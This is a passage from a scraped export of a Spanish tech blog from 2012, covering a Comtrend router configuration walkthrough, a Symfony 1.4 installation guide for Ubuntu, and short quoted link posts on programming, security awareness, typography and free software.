panel de administración del router. Vamos a Management \u0026gt; Service address y dejamos marcados:\nHTTP desde LAN SSH desde LAN Resto deshabilitado, si no lo vamos a usar. Ahora configuraremos la interfaz ATM. Vamos a Advanced setup \u0026gt; Layer2 interface \u0026gt; ATM interface \u0026gt; Add:\nVPI: 8 VCI: 35 DSL Latency: Path0 Link Type: EoA Connection Mode: Default Mode Encapsulation Mode: LLC/SNAP-BRIDGING Service Category: UBR without PCR IP QoS Scheduler: Strict Policy Le damos a guardar.\nAhora la interfaz WAN. Vamos a Advanced setup \u0026gt; WAN interface \u0026gt; Add, seleccionamos atm(0_8_35) \u0026gt; PPPoE y marcamos:\nEnable NAT Enable firewall El resto de opciones de la interfaz las podemos dejar en blanco o por defecto.\nAñadiremos los servidores DNS. Vamos a Advanced setup \u0026gt; WAN service \u0026gt; Router ppp0 \u0026gt; DNS servers:\nOpenDNS: 208.67.222.222 y 208.67.220.220 Google:8.8.8.8 y 8.8.4.4 Jazztel: 87.216.1.65 y 87.216.1.66 Ya está, con esto el router ya debería sincronizar y deberíamos poder navegar. El resto de opciones de configuración dependerán de las necesidades de cada uno.\nMás opciones Servidores virtuales Si queremos añadir entradas en la NAT vamos a Advanced setup \u0026gt; NAT \u0026gt; Virtual servers. Si queremos redireccionar el puerto 80, nos avisará de que la interfaz web de acceso al router se cambia al puerto 8080. Sin embargo esto no sucede, y si tenemos un dominio para acceder a nuestra red desde Internet, y accedemos a dicho dominio desde dentro de la red, accederemos al panel de administración del router y no al equipo al que habíamos redirigido el puerto.\nUna solución es añadir el dominio en el archivo /etc/hosts. Por ejemplo, si nuestro dominio es domain.tld y el servidor web tiene la ip 192.168.50.100, en /etc/hosts añadiremos:\ndomain.tld 192.168.50.100 Red inalámbrica Para configurar la red, vamos a Wireless \u0026gt; Basic:\nNos aseguramos de que WPS está desactivado, si no lo vamos a usar. No hace mucho se ha descubierto una vulnerabilidad que permite [acceso a la Wifi por fuerza bruta][]. Authentication: WPA-PSK, AES Si ponemos las mismas credenciales que teníamos anteriormente, es posible que nuestro equipo detecte la red y se conecte también a la red inalámbrica (además de que seguimos conectados por cable).\nActualización horaria Si queremos que la hora del router se actualice consultando los servidores NTP de internet, vamos a Management \u0026gt; Internet time, y lo activamos.\nReferencias » Nuevos firms no oficiales ( y libres, por fin :D) para el AR-5381u con soporte 3G y DLNA (Act. 4 de septiembre) » Nuevos firmwares (no oficiales) para el AR-5381u\n","permalink":"http://karpoke.ignaciocano.com/2012/06/04/cambiar-el-firmware-del-router-comtrend-ar-5381u-por-uno-libre/","summary":"\u003cp\u003eSi tenemos un \u003cem\u003erouter\u003c/em\u003e Comtrend AR-5381u, uno de los que entrega\nJazztel, podemos \u003ca href=\"http://bandaancha.eu/tema/1684224/nuevos-firms-no-oficiales-libres-fin-d-ar-5381u-soporte-3g-dlna-act-4-septiembre\"\u003eactualizar el firmware que trae por uno libre no\noficial\u003c/a\u003e.\u003c/p\u003e\n\u003ch2 id=\"por-qué-actualizar-el-firmware\"\u003e¿Por qué actualizar el firmware?\u003c/h2\u003e\n\u003cp\u003ePorque nos permite configurar completamente el \u003cem\u003erouter\u003c/em\u003e, sin\nrestricciones. En particular, podremos cambiar el usuario de acceso al\n\u003cem\u003erouter\u003c/em\u003e o deshabilitar TS-069 (administración remota por parte de\nJazztel y que es imposible deshabilitar con el \u003cem\u003efirmware\u003c/em\u003e oficial) si\nqueremos.\u003c/p\u003e\n\u003ch2 id=\"instalación\"\u003eInstalación\u003c/h2\u003e\n\u003cp\u003eLo primero es escoger uno de los \u003cem\u003efirmware\u003c/em\u003e disponibles. En mi caso, he\nprobado el \u003cem\u003efirmware\u003c/em\u003e \u003ccode\u003e657003-457(AR-5382u-A731-406CTL-C01_R07).bin\u003c/code\u003e. Se\npuede descargar desde \u003ca href=\"http://bandaancha.eu/store/Jazztel/AR5381NOF.zip\"\u003ebandaancha.eu\u003c/a\u003e.\u003c/p\u003e","title":"Cambiar el firmware del router Comtrend AR-5381u por uno libre"},{"content":" Porque, en el mejor de los casos, seguimos pensando que ver la ”s” de https:// y un candado cerrado en nuestro navegador web nos asegura que la página que visitamos es legítima. Porque pensamos que si tecleamos el nombre del dominio en la barra de direcciones no es posible que estemos visitando una página fraudulenta. Porque nos conocemos al dedillo la aplicación de banca electrónica de nuestra entidad financiera. Porque si esta página nos solicita más caracteres de lo habitual a la hora de introducir la contraseña no sospechamos. Porque si tras autenticarnos en la misma nos solicita todas las posiciones de la tarjeta de coordenadas, en muchos casos las seguimos introduciendo.\n» @Mikel Gastesi | segu-info.com.ar\n","permalink":"http://karpoke.ignaciocano.com/2012/06/04/porque-robar-a-los-pequenos-es-mas-facil/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePorque, en el mejor de los casos, seguimos pensando que ver la ”s” de\nhttps:// y un candado cerrado en nuestro navegador web nos asegura que\nla página que visitamos es legítima. Porque pensamos que si tecleamos\nel nombre del dominio en la barra de direcciones no es posible que\nestemos visitando una página fraudulenta. Porque nos conocemos al\ndedillo la aplicación de banca electrónica de nuestra entidad\nfinanciera. Porque si esta página nos solicita más caracteres de lo\nhabitual a la hora de introducir la contraseña no sospechamos. Porque\nsi tras autenticarnos en la misma nos solicita todas las posiciones de\nla tarjeta de coordenadas, en muchos casos las seguimos introduciendo.\u003c/p\u003e","title":"Porque robar a los pequeños es más fácil"},{"content":" I may not be a great programmer, but I have a ton of fun programming. As a self-taught hacker, I’ve always enjoyed programming to a great extent\u0026ndash;but everyone has their ups and downs. These are simply my reflections about what makes me happy while programming, and serves as reminder to myself why I should keep pushing onwards!\n» rdegges.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/03/how-to-have-fun-programming/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI may not be a great programmer, but I have a ton of fun programming.\nAs a self-taught hacker, I’ve always enjoyed programming to a great\nextent\u0026ndash;but everyone has their ups and downs. These are simply my\nreflections about what makes me happy while programming, and serves as\nreminder to myself why I should keep pushing onwards!\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://rdegges.com/how-to-have-fun-programming\"\u003erdegges.com\u003c/a\u003e\u003c/p\u003e","title":"How to Have Fun Programming"},{"content":"Symfony es una framework MVC escrito en PHP para el desarrollo rápido de páginas web. Además, ofrece un conjunto de buenas prácticas para desarrollar páginas más seguras y con un coste de mantenimiento menor.\nPara que la instalación sea más segura, los ficheros de Symfony debería estar fuera del DocumentRoot.\nRequisitos Symfony se basa en entorno LAMPP, por lo que suponemos que ya tenemos configurado Apache, MySQL y PHP versión 5.2.4 o superior. Para comprobar si todo está correctamente configurado y que cumplimos los requerimientos para Symfony, descargamos siguiente script y lo ejecutamos, pasando como parámetro la ruta al archivo php.ini que utiliza apache (por defecto, al ejecutarlo desde el terminal en lugar del navegador, utiliza otro archivo php.ini):\n$ wget http://sf-to.org/1.4/check.php $ php --php-ini /etc/php5/apache2/php.ini check.php __****************************__ _ _ _ symfony requirements check _ _ _ __****************************__ php.ini used by PHP: /etc/php5/apache2/php.ini __ WARNING __ * The PHP CLI can use a different php.ini file * than the one used with your web server. * If this is the case, please launch this * utility from your web server. __ WARNING __ __ Mandatory requirements __ OK PHP version is at least 5.2.4 (5.3.2-1ubuntu4.15) __ Optional checks __ OK PDO is installed OK PDO has some drivers installed: mysql, sqlite, sqlite2 OK PHP-XML module is installed OK XSL module is installed OK The token_get_all() function is available OK The mb_strlen() function is available OK The iconv() function is available OK The utf8_decode() is available OK The posix_isatty() is available OK A PHP accelerator is installed OK php.ini has short_open_tag set to off OK php.ini has magic_quotes_gpc set to off OK php.ini has register_globals set to off OK php.ini has session.auto_start set to off OK PHP version is not 5.2.9 Corregimos los errores que nos dé, si es que ya sea editando la configuración de php.ini o instalando paquetes que nos pudieran faltar (como, por ejemplo, php-xml-parser, php5-xsl o php-apc).\nSi queremos, podemos copiar el archivo al DocumentRoot y abrirlo mediante el navegador, para estar seguros de que no hay ningún problema, y acto seguido lo borramos.\nInstalación Como hemos comentado al principio, colocaremos los ficheros de Symfony fuera del DocumentRoot. Crearemos el directorio para alojar los proyectos y, dentro de él, el directorio para el primer proyecto:\n$ mkdir -p /home/sfprojects/sfproject $ cd /home/sfprojects/sfproject Hay dos versiones principales de Symfony, la 1.4, versión estable con soporte hasta finales de este año, y la 2.0, que será la próxima versión principal. Utilizaremos la 1.4.\nA la hora de instalar Symfony, podemos hacerlo de forma global, para todo el sistema, o local, independiente para cada proyecto. La segunda es más recomendable, sobre todo si vamos a tener varios proyectos. De esta forma, la actualización de uno no afectará al resto.\nSe considera una buena práctica instalar Symfony en el directorio lib/vendor dentro del directorio raíz del proyecto, así que lo creamos primero:\n$ mkdir -p lib/vendor Instalaremos la versión estable actual de Symfony desde el repositorio subversion:\n$ svn checkout http://svn.symfony-project.com/tags/RELEASE_1_4_18 symfony Cuando salga una nueva versión, podremos actualizar cambiando simplemente la URL del repositorio. También podríamos utilizar la versión en desarrollo, con lo que incluiríamos las correcciones de errores con sólo actualizar la copia de trabajo.\nCreación de un proyecto Desde el directorio que habíamos creado para el proyecto, /home/sfprojects/sfproject, creamos el proyecto con Symfony, de nombre sfproject, mediante la tarea generate:project:\n$ cd /home/sfprojects/sfproject $ php lib/vendor/symfony/data/bin/symfony generate:project sfproject Esta tarea crea la estructura de directorios:\napps/ Contiene las aplicaciones del proyecto cache/ Ficheros cacheados config/ Ficheros de configuración del proyecto data/ Ficheros con datos iniciales (fixtures) lib/ Bibliotecas y clases del proyecto log/ Ficheros de log plugins/ Plugins instalados test/ Ficheros con los tests unitarios y funcionales web/ El directorio raíz de la página web Cambiamos los permisos para los directorios cache y log. Estos son los únicos directorios en los que necesita escribir Symfony para comenzar:\n$ chmod 777 cache log La tarea, además, crea un acceso directo a lib/vendor/symfony/data/bin/symfony en el directorio del proyecto, para que sea más sencillo y rápido llamar al fichero.\nPara comprobar que la instalación es correcta, ejecutamos:\n$ ./symfony -V symfony version 1.4.18 (/home/sfproject/lib/vendor/symfony/lib) Nos aseguramos que en el archivo de configuración del proyecto, config/ProjectConfiguration.class.php, no hay una ruta absoluta sino relativa, con lo que podremos mover de lugar el directorio del proyecto sin que nada deje de funcionar:\nrequire_once dirname(__FILE__).\u0026#39;/../lib/vendor/symfony/lib/autoload/sfCoreAutoload.class.php\u0026#39;; Podemos ver una lista de opciones que nos ofrece el comando symfony, ejecutándolo sin ningún parámetro.\nBase de datos Antes de continuar, crearemos una base de datos específica para este proyecto y un usuario con privilegios únicamente para esta base de datos. Por ejemplo, si utilizamos MySQL:\n$ mysql -uroot -p mysql\u0026gt; CREATE DATABASE sfproject; mysql\u0026gt; CREATE USER \u0026#39;sfproject\u0026#39;@\u0026#39;localhost\u0026#39; IDENTIFIED BY \u0026#39;password\u0026#39;; mysql\u0026gt; GRANT ALL PRIVILEGES ON sfproject.* TO \u0026#39;sfproject\u0026#39;@\u0026#39;localhost\u0026#39;; mysql\u0026gt; FLUSH PRIVILEGES; Symfony puede trabajar con diferentes bases de datos gracias a PDO (extensión para la abstracción de acceso a los datos). Para trabajar con PDO puede utilizaz dos herramientas: Doctrine, por defecto cuando creamos un proyecto, y Propel.\nPara configurar la base de datos ejecutamos:\n$ ./symfony configure:database \u0026#34;mysql:host=localhost;dbname=sfproject\u0026#34; sfproject password Si no queremos escribir la contraseña en el terminal, para que no quede registrada en el historial, podemos omitirla y luego editar el fichero config/databases.yml. Una razón para tener el directorio del proyecto fuera del DocumentRoot es evitar que este archivo llegue a ser accesible.\nCreación de una aplicación Para crear la aplicación frontend utilizaremos la tarea generate:app, desde el directorio raíz del proyecto:\n$ ./symfony generate:app frontend Esta tarea crea la siguiente estructura dentro del directorio apps/frontend:\nconfig/ Contiene los ficheros de configuración de la aplicación lib/ Contiene las bibliotecas y las clases de la aplicación modules/ Contiene el código de la aplicación (MVC) templates/ Contiene las plantillas globales Por defecto, Symfony nos protege de dos de las vulnerabilidades más extendidas en la web: XSS, escapando el contenido mostrado, y CSRF, creando un código CSRF aleatorio.\nConfiguración del servidor En el DocumentRoot sólo deberían estar los ficheros que deban poder ser accedidos por el servidor web, como imágenes, hojas de estilo y Javascripts.\nCreamos el fichero de configuración del sitio, /etc/apache2/sites-available/sfproject.domain.tld:\nServerName sfproject.domain.tld DocumentRoot \u0026#34;/home/sfprojects/sfproject/web\u0026#34; DirectoryIndex index.php AllowOverride All Allow from All Alias /sf /home/sfprojects/sfproject/lib/vendor/symfony/data/web/sf AllowOverride All Allow from All Si no tenemos configurado el dominio sfproject.domain.tld, podemos crear un alias en el fichero /etc/hosts:\n127.0.0.1 sfproject.domain.tld El alias sf sirve para acceder a las imágenes, hojas de estilo y Javascripts de Symfony, necesarios para mostrar correctamente las páginas por defecto.\nActivamos el sitio y reiniciamos apache:\n$ sudo a2ensite sfproject.domain.tld $ sudo apache2ctl restart Si todo ha ido bien, introducimos http://sfproject.domain.tld/index.php/ en el navegador y veremos el mensaje de bienvenido. Si tenemos activado mod_rewrite no será necesario poner index.php. Para acceder al entorno de desarrollo dela aplicación que hemos creado ponemos http://sfproject.domain.tld/frontend_dev.php/.\nEntornos Dentro del directorio web/ hay dos ficheros PHP, index.php y frontend_dev.php. A estos ficheros se les llama front controllers. Todas las peticiones a la aplicación se hacen a través de ellos. Ambos apuntan a la misma aplicación, pero en diferentes entornos.\nCuando se desarrolla una aplicación se necesitan varios entornos:\ndesarrollo: utilizado por los programadores para añadir características, arreglar fallos, etc test: utilizado para realizar los tests de forma automática staging: utilizado por el cliente para probar la aplicación y reportar fallos o características que falten producción: utilizado por los usuarios finales Cada entorno tiene características diferentes. El de desarrollo está enfocado a los programadores, la aplicación registra todo tipo de detalles para facilitar la depuración, se deshabilita la caché para que los cambios tengan efecto de forma inmediata, cuando ocurre un error, Symfony muestra información detallada, etc. En producción, la caché está activada, se personalizan los mensajes de error y se optimiza para mejorar la experiencia de usuario.\nReferencias » Symfony: getting started\n","permalink":"http://karpoke.ignaciocano.com/2012/06/03/symfony-en-ubuntu-lucid-lynx-10-04/","summary":"\u003cp\u003e\u003ca href=\"http://www.symfony-project.org/\"\u003eSymfony\u003c/a\u003e es una \u003cem\u003eframework\u003c/em\u003e MVC escrito en PHP para el desarrollo\nrápido de páginas web. Además, ofrece un conjunto de buenas prácticas\npara desarrollar páginas más seguras y con un coste de mantenimiento\nmenor.\u003c/p\u003e\n\u003cp\u003ePara que la instalación sea más segura, los ficheros de Symfony debería\nestar fuera del \u003ccode\u003eDocumentRoot\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"requisitos\"\u003eRequisitos\u003c/h2\u003e\n\u003cp\u003eSymfony se basa en entorno LAMPP, por lo que suponemos que ya tenemos\nconfigurado Apache, MySQL y PHP versión 5.2.4 o superior. Para comprobar\nsi todo está correctamente configurado y que cumplimos los\nrequerimientos para Symfony, descargamos siguiente \u003cem\u003escript\u003c/em\u003e y lo\nejecutamos, pasando como parámetro la ruta al archivo \u003ccode\u003ephp.ini\u003c/code\u003e que\nutiliza apache (por defecto, al ejecutarlo desde el terminal en lugar\ndel navegador, utiliza otro archivo \u003ccode\u003ephp.ini\u003c/code\u003e):\u003c/p\u003e","title":"Symfony en Ubuntu Lucid Lynx 10.04"},{"content":" This scientific visualization of a computer simulation depicts the inevitable collision between our Milky Way galaxy and the Andromeda galaxy (also known as Messier 31). NASA Hubble Space Telescope observations indicate that the two galaxies, pulled together by their mutual gravity, will crash together in a near-head-on collision about 4 billion years from now. The thin disk shapes of these spiral galaxies are strongly distorted and irrevocably transformed by the encounter. Around 6 billion years from now, the two galaxies will merge to form a single elliptical galaxy.\n» hubblesite.org\n","permalink":"http://karpoke.ignaciocano.com/2012/06/01/crash-of-the-titans-science-visualization/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis scientific visualization of a computer simulation depicts the\ninevitable collision between our Milky Way galaxy and the Andromeda\ngalaxy (also known as Messier 31). NASA Hubble Space Telescope\nobservations indicate that the two galaxies, pulled together by their\nmutual gravity, will crash together in a near-head-on collision about\n4 billion years from now. The thin disk shapes of these spiral\ngalaxies are strongly distorted and irrevocably transformed by the\nencounter. Around 6 billion years from now, the two galaxies will\nmerge to form a single elliptical galaxy.\u003c/p\u003e","title":"Crash of the Titans Science Visualization"},{"content":" Listado de aquellas publicaciones tanto de naturaleza académica y universitaria como divulgativa y profesional que son accesibles, de forma gratuita, a través de Internet, sobre estudios, ensayos, informes académicos sobre la temática de las aplicaciones educativas de las tecnologías digitales: el elearning o docencia virtual, los entornos personales del aprendizaje, la integración escolar de las TIC, los portafolios electrónicos, las redes sociales y el aprendizaje, la web 2.0 en educación, etcétera. Para confeccionar este índice de revistas he manejado dos bases de datos de publicaciones electrónicas: DOAJ Directory of Open Acces Journals Education y e-Revistas Plataforma Open Access de Revistas Científicas Electrónicas Españolas y Latinoamericanas. Y también, por supuesto, el buscador Google.\n» humanodigital.com.ar\n","permalink":"http://karpoke.ignaciocano.com/2012/05/31/revistas-y-bases-de-datos-on-line-sobre-tic-y-educacion/","summary":"\u003cblockquote\u003e\n\u003cp\u003eListado de aquellas publicaciones tanto de naturaleza académica y\nuniversitaria como divulgativa y profesional que son accesibles, de\nforma gratuita, a través de Internet, sobre estudios, ensayos,\ninformes académicos sobre la temática de las aplicaciones educativas\nde las tecnologías digitales: el elearning o docencia virtual, los\nentornos personales del aprendizaje, la integración escolar de las\nTIC, los portafolios electrónicos, las redes sociales y el\naprendizaje, la web 2.0 en educación, etcétera. Para confeccionar este\níndice de revistas he manejado dos bases de datos de publicaciones\nelectrónicas: DOAJ Directory of Open Acces Journals Education y\ne-Revistas Plataforma Open Access de Revistas Científicas Electrónicas\nEspañolas y Latinoamericanas. Y también, por supuesto, el buscador\nGoogle.\u003c/p\u003e","title":"Revistas y bases de datos on line sobre TIC y Educación"},{"content":" I would like to ask for help in compiling a list of as many TCS-related conferences and workshops as possible. My main motivation for doing this is to plan possible blog coverage of more theory venues \u0026ndash; finding correspondents attending these events who would be willing to write either brief or in-depth blog entries about events they are attending. Beyond that, I hope a list like this would give everyone a better sense of the lay of the theory land.\n» cstheory.stackexchange.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/30/list-of-tcs-conferences-and-workshops/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI would like to ask for help in compiling a list of as many\nTCS-related conferences and workshops as possible. My main motivation\nfor doing this is to plan possible blog coverage of more theory venues\n\u0026ndash; finding correspondents attending these events who would be willing\nto write either brief or in-depth blog entries about events they are\nattending. Beyond that, I hope a list like this would give everyone a\nbetter sense of the lay of the theory land.\u003c/p\u003e","title":"List of TCS conferences and workshops"},{"content":" Typical blog posts about Dropbox security concentrate on data or network encryption. I want to talk about protecting your system from Dropbox the application, as well as Dropbox the company. In this blog post I tell you how to prepare for a theoretical scenario where Dropbox turns malicious. I’ve done a number of things to make Dropbox run in a much more secure fashion on my Ubuntu laptop. Hopefully I will introduce you to some vulnerabilities that you weren’t aware of, and teach how to protect against them. Many of the attacks and defenses described here are portable to apps other than Dropbox.\n» grepular.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/30/protecting-your-gnulinux-system-from-dropbox/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTypical blog posts about Dropbox security concentrate on data or\nnetwork encryption. I want to talk about protecting your system from\nDropbox the application, as well as Dropbox the company. In this blog\npost I tell you how to prepare for a theoretical scenario where\nDropbox turns malicious. I’ve done a number of things to make Dropbox\nrun in a much more secure fashion on my Ubuntu laptop. Hopefully I\nwill introduce you to some vulnerabilities that you weren’t aware of,\nand teach how to protect against them. Many of the attacks and\ndefenses described here are portable to apps other than Dropbox.\u003c/p\u003e","title":"Protecting Your GNU/Linux System from Dropbox"},{"content":" I’ve written before about the somewhat doubtful advantages of Class-Based Views.\nSince then, I’ve done more work as maintenance programmer on a Django project, and I’ve been reminded that library and framework design must take into account the fact that not all developers are experts. Even if you only hire the best, no-one can be an expert straight away.\nThinking through things more from the perspective of a maintenance programmer, my doubts about CBVs have increased, to the point where I recently tweeted that CBVs were a mistake.\nSo I thought I’d explain my reasons here. First, I’ll look at the motivation behind CBVs, how they are doing at solving what they are supposed to solve, and then analyse the problems with them in terms of the Zen of Python.\n» lukeplant.me.uk\n","permalink":"http://karpoke.ignaciocano.com/2012/05/29/djangos-cbvs-were-a-mistake/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI’ve written before about the somewhat doubtful advantages of\nClass-Based Views.\u003c/p\u003e\n\u003cp\u003eSince then, I’ve done more work as maintenance programmer on a Django\nproject, and I’ve been reminded that library and framework design must\ntake into account the fact that not all developers are experts. Even\nif you only hire the best, no-one can be an expert straight away.\u003c/p\u003e\n\u003cp\u003eThinking through things more from the perspective of a maintenance\nprogrammer, my doubts about CBVs have increased, to the point where I\nrecently tweeted that CBVs were a mistake.\u003c/p\u003e","title":"Django’s CBVs were a mistake"},{"content":" Apparently, in Python, it is easier to ask for forgiveness rather than seek permission. That is to say, the normal approach when writing Python code is to assume that what you are trying to do will work properly. If something exceptional happens and the code doesn’t work the way you were hoping, then the Python interpreter will tell you of the error so that you can handle that exceptional circumstance. This general approach, of trying to do something, then cleaning up if something goes wrong is acronymically called EAFP (”easier to ask for forgiveness than permission”).\n» Brendan Scott | python4kids.wordpress.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/29/being-exceptional/","summary":"\u003cblockquote\u003e\n\u003cp\u003eApparently, in Python, it is easier to ask for forgiveness rather than\nseek permission. That is to say, the normal approach when writing\nPython code is to assume that what you are trying to do will work\nproperly. If something exceptional happens and the code doesn’t work\nthe way you were hoping, then the Python interpreter will tell you of\nthe error so that you can handle that exceptional circumstance. This\ngeneral approach, of trying to do something, then cleaning up if\nsomething goes wrong is acronymically called EAFP (”easier to ask for\nforgiveness than permission”).\u003c/p\u003e","title":"Being exceptional"},{"content":"» infografía | via cyberhades.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/28/the-history-of-encryption/","summary":"\u003cp\u003e» \u003ca href=\"http://visually.visually.netdna-cdn.com/TheHistoryofEncryption_4fa292ebe5bac_w587.jpg\"\u003einfografía\u003c/a\u003e | via \u003ca href=\"http://www.cyberhades.com/2012/05/07/historia-del-cifrado-infografia/\"\u003ecyberhades.com\u003c/a\u003e\u003c/p\u003e","title":"The History of Encryption"},{"content":" Any application of typography can be divided into two arenas: micro and macro. Understanding the difference between the two is especially useful when crafting a reading experience, because it allows the designer to know when to focus on legibility and when to focus on readability. This article focuses mostly on a few simple macrotypographic techniques”with a dash of micro”and on how to combine them all to build a more harmonious, adaptable and, most importantly, readable Web page.\n» smashingmagazine.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/28/applying-macrotypography-for-a-more-readable-web-page/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAny application of typography can be divided into two arenas: micro\nand macro. Understanding the difference between the two is especially\nuseful when crafting a reading experience, because it allows the\ndesigner to know when to focus on legibility and when to focus on\nreadability.\nThis article focuses mostly on a few simple macrotypographic\ntechniques”with a dash of micro”and on how to combine them all to\nbuild a more harmonious, adaptable and, most importantly, readable Web\npage.\u003c/p\u003e","title":"Applying Macrotypography For A More Readable Web Page"},{"content":" Le decimos a la gente que usamos Linux porque es seguro. O porque es libre, porque lo podemos adaptar a nuestras necesidades, porque es gratis, porque tiene un soporte excelente por parte de la comunidad\u0026hellip;\n» wallbase.cc\n","permalink":"http://karpoke.ignaciocano.com/2012/05/27/por-que-usamos-linux/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLe decimos a la gente que usamos Linux porque es seguro. O porque es\nlibre, porque lo podemos adaptar a nuestras necesidades, porque es\ngratis, porque tiene un soporte excelente por parte de la comunidad\u0026hellip;\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://wallbase.cc/wallpaper/945124\"\u003ewallbase.cc\u003c/a\u003e\u003c/p\u003e","title":"¿Por qué usamos Linux?"},{"content":" ”La pornografía infantil es genial,” dijo entusiastamente el sujeto. ”Los políticos no entienden el intercambio de archivos, pero entienden la pornografía infantil, y la quieren filtrar para ganar puntos con el público. Una vez que los convenzamos de filtrar la pornografía infantil, podremos hacer que extiendan el bloqueo al intercambio de archivos.”\n» falkvinge.net\n","permalink":"http://karpoke.ignaciocano.com/2012/05/27/por-que-el-lobby-de-los-derechos-de-autor-ama-la-pornografia-infantil/","summary":"\u003cblockquote\u003e\n\u003cp\u003e”La pornografía infantil es genial,” dijo entusiastamente el sujeto.\n”Los políticos no entienden el intercambio de archivos, pero entienden\nla pornografía infantil, y la quieren filtrar para ganar puntos con el\npúblico. Una vez que los convenzamos de filtrar la pornografía\ninfantil, podremos hacer que extiendan el bloqueo al intercambio de\narchivos.”\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://es.falkvinge.net/2012/05/23/redefiniendo-el-cinismo-porque-el-lobby-de-los-derechos-de-autor-ama-la-pornografia-infantil/\"\u003efalkvinge.net\u003c/a\u003e\u003c/p\u003e","title":"Por qué el lobby de los derechos de autor ama la pornografía infantil"},{"content":" The interactive Linux kernel map helps you traverse complex interconnections between subsystems of the kernel while you explore its source code. A Linux hacker, trying to track down a bug or just understand how some subsystem works, can get exhausted just trying to figure out what invokes what ” so the kernel map comes to the rescue!\n» makelinux.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/27/interactive-map-of-linux-kernel/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe interactive Linux kernel map helps you traverse complex interconnections\nbetween subsystems of the kernel while you explore its source code. A Linux\nhacker, trying to track down a bug or just understand how some subsystem\nworks, can get exhausted just trying to figure out what invokes what ” so the\nkernel map comes to the rescue!\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://www.makelinux.com/kernel_map/intro\"\u003emakelinux.com\u003c/a\u003e\u003c/p\u003e","title":"Interactive map of Linux kernel"},{"content":"» theoatmeal.com | Response to Forbes\n","permalink":"http://karpoke.ignaciocano.com/2012/05/27/why-nikola-testa-was-the-greatest-geek-who-ever-lived/","summary":"\u003cp\u003e» \u003ca href=\"http://theoatmeal.com/comics/tesla\"\u003etheoatmeal.com\u003c/a\u003e | \u003ca href=\"http://theoatmeal.com/blog/tesla_response\"\u003eResponse\u003c/a\u003e to Forbes\u003c/p\u003e","title":"Why Nikola Testa was the greatest geek who ever lived"},{"content":" Ever since I came across Jürg Lehni’s essay on typographic technology and digital fonts, Typeface As Programme, I’ve been fascinated with the story of Donald E. Knuth and his unexpected contributions to typography.\n» @Jason Z. | 37signals.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/26/the-art-of-computer-typography/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEver since I came across Jürg Lehni’s essay on typographic technology\nand digital fonts, Typeface As Programme, I’ve been fascinated with\nthe story of Donald E. Knuth and his unexpected contributions to\ntypography.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» @Jason Z. | \u003ca href=\"https://37signals.com/svn/posts/3183-the-art-of-computer-typography\"\u003e37signals.com\u003c/a\u003e\u003c/p\u003e","title":"The Art of Computer Typography"},{"content":" Porque son gente lista y genial, de inacabable curiosidad, sentido del humor y vorazmente críticos, capaces de ponerlo todo patas arriba porque se les ocurrió una idea y con una ética colectiva que está cambiando el mundo. ¡Ah, no! ¿Que no es así como pensabas que eran los hackers? ¿Imaginabas unos tipos malvados, delincuentes habituales, sin empacho en asaltar tu ordenador y tu cuenta bancaria? ¿Esos de los que hablan día sí día también los medios y la policía, poniéndoles la etiqueta de ”hacker”?\n» @merce | grn.es\n","permalink":"http://karpoke.ignaciocano.com/2012/05/25/por-que-me-enamore-de-los-hackers/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePorque son gente lista y genial, de inacabable curiosidad, sentido del\nhumor y vorazmente críticos, capaces de ponerlo todo patas arriba\nporque se les ocurrió una idea y con una ética colectiva que está\ncambiando el mundo. ¡Ah, no! ¿Que no es así como pensabas que eran los\nhackers? ¿Imaginabas unos tipos malvados, delincuentes habituales, sin\nempacho en asaltar tu ordenador y tu cuenta bancaria? ¿Esos de los que\nhablan día sí día también los medios y la policía, poniéndoles la\netiqueta de ”hacker”?\u003c/p\u003e","title":"Por qué me enamoré de los hackers"},{"content":" As everyone knows, an important threat against the Internet is that of a coordinated DDoS attack against the root TLD DNS servers. The way I”d solve is with a simple inline device that both blocks some simple attacks from hitting the DNS server, but which can also answer simple queries, offloading the main server, even if it”s failed. This can be done with $2000, half for the desktop machine, and the other half for the dual-port 10-gig Ethernet.\n» erratasec.blogspot.com.es\n","permalink":"http://karpoke.ignaciocano.com/2012/05/25/dns-vs-large-memory-pages/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAs everyone knows, an important threat against the Internet is that of\na coordinated DDoS attack against the root TLD DNS servers. The way\nI”d solve is with a simple inline device that both blocks some simple\nattacks from hitting the DNS server, but which can also answer simple\nqueries, offloading the main server, even if it”s failed. This can be\ndone with $2000, half for the desktop machine, and the other half for\nthe dual-port 10-gig Ethernet.\u003c/p\u003e","title":"DNS vs. large memory pages"},{"content":" El propósito del software libre es hacer que el código que corre en las máquinas que gobiernan nuestras vidas sea transparente. En palabras de Lawrence Lessig, el software libre es ”libre en el sentido de que el control del código de desarrollo sea transparente para todos, y que cualquier persona tenga el derecho de tomar ese control, y modificarlo si él o ella cree conveniente.”\nEl mecanismo por el cual el software libre logra esto es el copyleft. El copyleft es un hack en el copyright (la ley de derechos de autor) que le quita los derechos exclusivos al titular del copyright y los comparte con el usuario, otorgándole el derecho de modificar, copiar, compartir y redistribuir el software, bajo la condición de que deben transferirse los mismos derechos a usuarios subsiguientes. ”Si uno usa y adapta un programa de software libre, y luego libera esa nueva versión adaptada para el público, debe 